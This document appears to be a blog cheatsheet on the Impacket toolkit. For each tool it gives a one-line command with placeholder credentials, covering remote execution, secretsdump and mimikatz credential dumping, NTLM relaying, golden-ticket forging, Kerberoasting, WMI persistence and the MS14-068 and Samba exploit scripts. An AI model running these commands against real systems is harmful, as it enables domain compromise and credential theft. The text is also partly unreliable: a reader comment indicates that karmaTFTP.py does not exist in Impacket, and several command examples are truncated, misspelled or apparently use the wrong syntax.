Impacket Cheatsheet For Penetration Testers

Discover the power of Impacket, an incredibly versatile collection of Python classes for working with network protocols. In this Impacket cheatsheet, we will dive into some of the most essential command examples, outlining their functionalities and showing how to apply them in ethical hacking contexts.

This Impacket cheatsheet provides a snapshot of the key functionalities that the library offers, assisting ethical hackers in their endeavors. By leveraging Impacket’s various commands and tools, ethical hackers can effectively test the security of their networked systems, ensuring that they’re well-prepared for any real-world threats.

Executing remote commands

psexec.py

psexec.py provides functionality similar to PSEXEC, utilizing RemComSvc. The following command example demonstrates how you could utilize psexec.py:

python psexec.py domain/user:password@target_machine

smbexec.py: PSEXEC Alternative without RemComSvc

smbexec.py is another approach to PSEXEC, yet it does not require RemComSvc. What sets this method apart is that it creates a local smbserver to collect the command outputs, particularly beneficial when the target machine lacks a writable share. Here’s how to use smbexec.py:

python smbexec.py domain/user:password@target_machine

atexec.py: Leveraging Task Scheduler Service

atexec.py executes commands on the target machine using the Task Scheduler service, returning the output of the performed command. An example of atexec.py command could be:

ython atexec.py domain/user:password@target_machine

wmiexec.py: Semi-Interactive Shell via Windows Management Instrumentation

wmiexec.py offers a semi-interactive shell used through Windows Management Instrumentation (WMI). This technique is highly stealthy as it doesn’t necessitate any service/agent installation on the target server and operates as an Administrator. An example of wmiexec.py command would be:

python wmiexec.py domain/user:password@target_machine

dcomexec.py: Utilizing Different DCOM Endpoints

dcomexec.py offers a semi-interactive shell akin to wmiexec.py but employs different DCOM endpoints. This technique currently supports MMC20.Application, ShellWindows, and ShellBrowserWindow objects. Here’s an example of a dcomexec.py command:

python dcomexec.py domain/user:password@target_machine

 Kerberos

GetTGT.py: Requesting a Ticket Granting Ticket

GetTGT.py enables you to request a Ticket Granting Ticket (TGT) and save it as ccache, given a password, hash, or aesKey. An example command could look like this:

python GetTGT.py domain/user:password

GetST.py: Requesting a Service Ticket

GetST.py is designed to request a Service Ticket (ST) and save it as ccache given a password, hash, aesKey, or TGT in ccache. If an account has constrained delegation (with protocol transition) privileges, you can use the ‘-impersonate’ switch to request the ticket on behalf of another user. Here’s an example:

python GetST.py domain/user:password -impersonate victim_user

GetPac.py: Acquiring PAC Structure

GetPac.py uses a mix of [MS-SFU]’s S4USelf + User to User Kerberos Authentication to acquire the PAC (Privilege Attribute Certificate) structure of a target user by having normal authenticated user credentials. An example of this command is:

python GetPac.py domain/user:password target_user

GetUserSPNs.py: Fetching Service Principal Names

GetUserSPNs.py finds and fetches Service Principal Names (SPNs) associated with normal user accounts. The output is compatible with JtR and HashCat. Here’s an example of this command:

python GetUserSPNs.py domain/user:password

GetNPUsers.py: Listing TGTs

GetNPUsers.py lists and gets TGTs for users who have the ‘Do not require Kerberos preauthentication’ property set (UF_DONT_REQUIRE_PREAUTH). The output is compatible with JtR. Here’s an example:

python GetNPUsers.py domain/

rbcd.py: Handling the msDS-AllowedToActOnBehalfOfOtherIdentity Property

rbcd.py handles the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer. Example usage of this script can be as follows:

python rbcd.py domain/user:password

ticketConverter.py: Converting Kirbi Files

ticketConverter.py converts kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa. An example of using this script might be:

python ticketConverter.py mimikatz.kirbi

ticketer.py: Creating Golden/Silver Tickets

ticketer.py creates Golden/Silver tickets from scratch or based on a template (legally requested from the KDC), allowing you to customize parameters set inside the PAC_LOGON_INFO structure. An example of this command is:

python ticketer.py -golden -user victim_user -domain 

Windows Swag

SecretsDump.py: Dumping Secrets

SecretsDump.py is a potent script that allows for the dumping of password hashes, LSA secrets, cached credentials, and other sensitive information from a Windows system. You can specify a target as local (must run script as admin), a remote target (needs credentials), or a remote target with psexec (needs admin credentials). Here’s an example:

python SecretsDump.py domain/user:password@target

Kerbrute.py: Brute Forcing Kerberos

Kerbrute.py is a very handy tool for brute-forcing user/password combinations against Kerberos. This can be quite helpful in enumerating valid users or discovering weak passwords within a given domain. An example of this command is:

python Kerbrute.py -userfile userlist.txt -password Passw0rd! domain.com

karmaSMB.py: SMB Relay Attack

karmaSMB.py allows for the execution of an SMB relay attack. This is where authentication attempts from a client are intercepted and relayed to a third-party target, potentially allowing for unauthorized access. Here’s an example of how to use this script:

python karmaSMB.py -h target

karmaTFTP.py: TFTP Relay Attack

karmaTFTP.py performs a similar function to karmaSMB.py, but operates over TFTP instead. The usage of this script is pretty similar:

python karmaTFTP.py -h target

Windows Secrets

secretsdump.py

SecretsDump.py executes several techniques to dump secrets from the remote machine without deploying any agent there. For SAM and LSA Secrets, including cached credentials, the script attempts to read as much data as possible from the registry. Then, it saves the hives in the target system’s %SYSTEMROOT%\Temp directory and reads the remaining data from there. For DIT files, SecretsDump.py dumps NTLM hashes, Plaintext credentials (when available), and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin with the smbexec/wmiexec approach. The script initiates the services required for its operation if they are not available (like Remote Registry, even if it’s disabled). After the operation is complete, everything is restored to its original state. The typical command usage is:

python secretsdump.py domain/user:password@target

mimikatz.py

Mimikatz.py is a mini-shell that controls a remote mimikatz RPC server developed by @gentilkiwi. The tool can extract plaintexts passwords, hash, PIN code, and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket, or build Golden tickets. Here’s an example of how to use this script:

python mimikatz.py domain/user:password@target

Server Tools

ntlmrelayx.py

Ntlmrelayx.py executes NTLM Relay Attacks by setting up an SMB, HTTP, WCF, and RAW Server and relaying credentials to multiple protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be activated when a connection is relayed (for example, creating a user through LDAP), or it can be run in SOCKS mode. In SOCKS mode, for every connection relayed, it becomes available to be used multiple times later through a SOCKS proxy. Here’s an example of this command:

python ntlmrelayx.py -h target

karmaSMB.py

KarmaSMB.py is an SMB Server that responds with specific file contents, regardless of the SMB share and pathname specified. It is a part of MiTM attacks, where authentication attempts from a client are intercepted and relayed to a third-party target, potentially allowing unauthorized access. Here’s an example of how to use this script:

python karmaSMB.py -h target

smbserver.py

SMBserver.py is a Python implementation of an SMB server. It allows for the quick setup of shares and user accounts. This tool can be useful in various scenarios including file sharing, systems management, and penetration testing. Here’s an example of how to use this script:

python smbserver.py SHARE_NAME PATH_TO_SHARE

WMI

wmiquery.py

Wmiquery.py is a script that allows you to issue WQL queries and obtain descriptions of WMI objects at the target system. This could be used, for instance, to select names from the win32_account. The script can be utilized to gather information and understand the target system’s environment. An example usage of this script could be:


python wmiquery.py domain/user:password@target "select name from win32_account"

wmipersist.py

Wmipersist.py is designed to create or remove a WMI Event Consumer/Filter and the link between them to execute Visual Basic scripts based on the WQL filter or timer specified. This could be useful in setting up or tearing down persistent mechanisms on the target system. Here’s an example of using this script:

python wmipersist.py domain/user:password@target install

Exploiting Known Vulnerabilities

goldenPac.py

GoldenPac.py is an exploit script for MS14-068. It saves the golden ticket and also launches a PSEXEC session at the target. This could be useful in situations where elevation of privilege is required, as the golden ticket provides access as a domain administrator. An example command for using this script is:

python goldenPac.py domain/user:password@target

sambaPipe.py

SambaPipe.py is a script designed to exploit CVE-2017-7494. It uploads and executes the shared library specified by the user through the -so parameter. This could be useful in situations where the target system is vulnerable and code execution is desired. Here’s an example of using this script:

python sambaPipe.py -so /path/to/shared/library.so domain/user:password@target

smbrelayx.py

Smbrelayx.py is an exploit script for CVE-2015-0005 that uses an SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will attempt to gather the SMB session key through NETLOGON. This can potentially provide unauthorized access. An example of how to use this script is:

python smbrelayx.py -h target

SMB/MSRPC

smbclient.py

Smbclient.py is a general-purpose SMB client that lets you list shares and files, rename, upload and download files, and create and delete directories, all using either a username and password or a username and hash combination. It’s a great example of how to use the impacket.smb module in action. Here’s an example of using this script:

python smbclient.py domain/user:password@target

addcomputer.py

Addcomputer.py allows you to add a computer to a domain using LDAP or SAMR (SMB). This can be useful for automating domain join operations or for penetration testing scenarios. Here’s an example of using this script:

python addcomputer.py domain/user:password@target

getArch.py

GetArch.py connects to a target (or list of targets) and gathers the OS architecture type installed by (ab)using a documented MSRPC feature. This can provide valuable information about the target environment. An example of using this script is:

python getArch.py domain/user:password@target

exchanger.py

Exchanger.py is a tool for connecting to MS Exchange via RPC over HTTP v2. It’s useful for interfacing with Exchange servers, particularly in penetration testing scenarios. Here’s an example of how to use this script:

python exchanger.py domain/user:password@target

lookupsid.py

LookupSid.py is a Windows SID brute forcer example through the [MS-LSAT] MSRPC Interface, aimed at finding remote users/groups. It’s an excellent script for information gathering in a penetration testing scenario. An example of using this script might be:

python lookupsid.py domain/user:password@target

netview.py

Netview.py gets a list of the sessions opened at the remote hosts and keeps track of them, looping over the hosts found and keeping track of who logged in/out from remote servers. This can be used to monitor user activity in the environment. Here’s an example of using this script:

python netview.py domain/user:password@target

reg.py

Reg.py is a remote registry manipulation tool through the [MS-RRP] MSRPC Interface, providing similar functionality as the REG.EXE Windows utility. It’s a powerful tool for remotely querying and modifying the Windows registry. Here’s an example of using this script:

python reg.py domain/user:password@target query -k HKLM\\Software

rpcdump.py

Rpcdump.py dumps the list of RPC endpoints and string bindings registered at the target. It also attempts to match them with a list of well-known endpoints. This can provide insight into what RPC services are running on a target system. Here’s an example of using this script:

python rpcdump.py domain/user:password@target

rpcmap.py

Rpcmap.py scans for listening DCE/RPC interfaces. It binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it uses a list of interface UUIDs observed in the wild and tries to bind to each interface. This script can help identify open DCE/RPC interfaces on a target system. Here’s an example of using this script:

python rpcmap.py domain/user:password@target

samrdump.py

Samrdump.py is an application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares, and other sensitive information exported through this service. It’s a useful script for gathering information from a target system. An example of using this script might be:

python samrdump.py domain/user:password@target

services.py

Services.py can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create, and change operations. This script can be valuable when you need to manage services on a remote Windows system. Here’s an example of using this script:

python services.py domain/user:password@target list

smbpasswd.py

Smbpasswd.py is an alternative to the smbpasswd tool and is designed to change expired passwords remotely over SMB (MSRPC-SAMR). This can be useful in a variety of administrative and penetration testing scenarios. Here’s an example of how to use this script:

python smbpasswd.py -r target -U user%oldpassword -n newpassword

Database Tools

mssqlinstance.py

Mssqlinstance.py retrieves the MSSQL instance names from the target host. This script can be useful in various reconnaissance and penetration testing scenarios. Here’s an example of using this script:

python mssqlinstance.py domain/user:password@target

mssqlclient.py

Mssqlclient.py is an MSSQL client, supporting both SQL and Windows Authentications (including hashes). It also supports TLS. This script can be a helpful tool in interacting with remote MSSQL servers. Here’s an example of how to use this script:

python mssqlclient.py domain/user:password@target

File Formats

esentutl.py

Esentutl.py is an Extensible Storage Engine format implementation. It allows dumping catalogs, pages, and tables of ESE databases (e.g., NTDS.dit). This script can be valuable in forensic scenarios or when analyzing ESE databases. Here’s an example of how to use this script:

python esentutl.py -m tables path\to\database.edb

ntfs-read.py

Ntfs-read.py provides an NTFS format implementation. This script provides a mini-shell for browsing and extracting an NTFS volume, including hidden/locked contents. This can be useful in forensic investigations or in data recovery scenarios. Here’s an example of how to use this script:

python ntfs-read.py /path/to/ntfs/device

registry-read.py

Registry-read.py is a Windows Registry file format implementation. It allows parsing offline registry hives. This can be extremely useful in forensic investigations or when analyzing registry files from a Windows system. Here’s an example of how to use this script:

python registry-read.py /path/to/registry/file

Miscellaneous

findDelegation.py

FindDelegation.py is a simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an Active Directory environment. This can be useful in assessing delegation configurations within a domain. Here’s an example of using this script:

python findDelegation.py domain/user:password@target

GetADUsers.py

GetADUsers.py gathers data about the domain’s users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes. This script can provide valuable data in user enumeration scenarios. Here’s an example of how to use this script:

python GetADUsers.py domain/user:password@target

Get-GPPPassword.py

Get-GPPPassword.py extracts and decrypts Group Policy Preferences passwords using streams for treating files instead of mounting shares. Additionally, it can parse GPP XML files offline. This script can be valuable for discovering potentially insecure GPP configurations. Here’s an example of how to use this script:

python Get-GPPPassword.py domain/user:password@target

mqtt_check.py

Mqtt_check.py is a simple MQTT example aimed at playing with different login options. It can be converted into an account/password brute forcer quite easily. This script can be useful in testing MQTT protocol security. Here’s an example of using this script:

python mqtt_check.py target -u username -P password

rdp_check.py

Rdp_check.py provides a partial implementation of [MS-RDPBCGR] and [MS-CREDSSP] just to reach CredSSP auth. This example tests whether an account is valid on the target host. This script can help in testing RDP configurations and user account validity. Here’s an example of using this script:

python rdp_check.py target username password

sniff.py

Sniff.py is a simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface. This script can be useful in network analysis or troubleshooting. Here’s an example of how to use this script:

python sniff.py -i eth0

sniffer.py

Sniffer.py is a simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols. This script can be valuable in network analysis or troubleshooting. Here’s an example of how to use this script:

python sniffer.py -p tcp -i eth0

ping.py

Ping.py is a simple ICMP ping script that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet. This script can be useful for basic network testing and troubleshooting. Here’s an example of how to use this script:

python ping.py target

ping6.py

Ping6.py is a simple IPv6 ICMP ping script that uses the ICMP echo and echo-reply packets to check the status of a host.

python ping6.py target

If the remote host is up, it should reply to the echo probe with an echo-reply packet. This script can be useful for basic network testing and troubleshooting in IPv6 networks.

Conclusion

In conclusion, Impacket is a robust and versatile ethical hacking toolset that can provide invaluable assistance for anyone involved in network security. By using this Impacket cheatsheet you can significantly enhance your penetration testing or exploit development capabilities.

Related posts

How to Improve Your Cyber Resilience by Strengthening User Privileges

The Dark Side of Viral Content: How Negative Reviews Can Snowball

Testing Gaming Monetization: Walking the Line Between Profit and Player Experience

1 comment

CyberP May 26, 2023 - 11:19 pm
Where can I find this karmaTFTP.py script? I do not see it within impacket.

Comments are closed.

Add Comment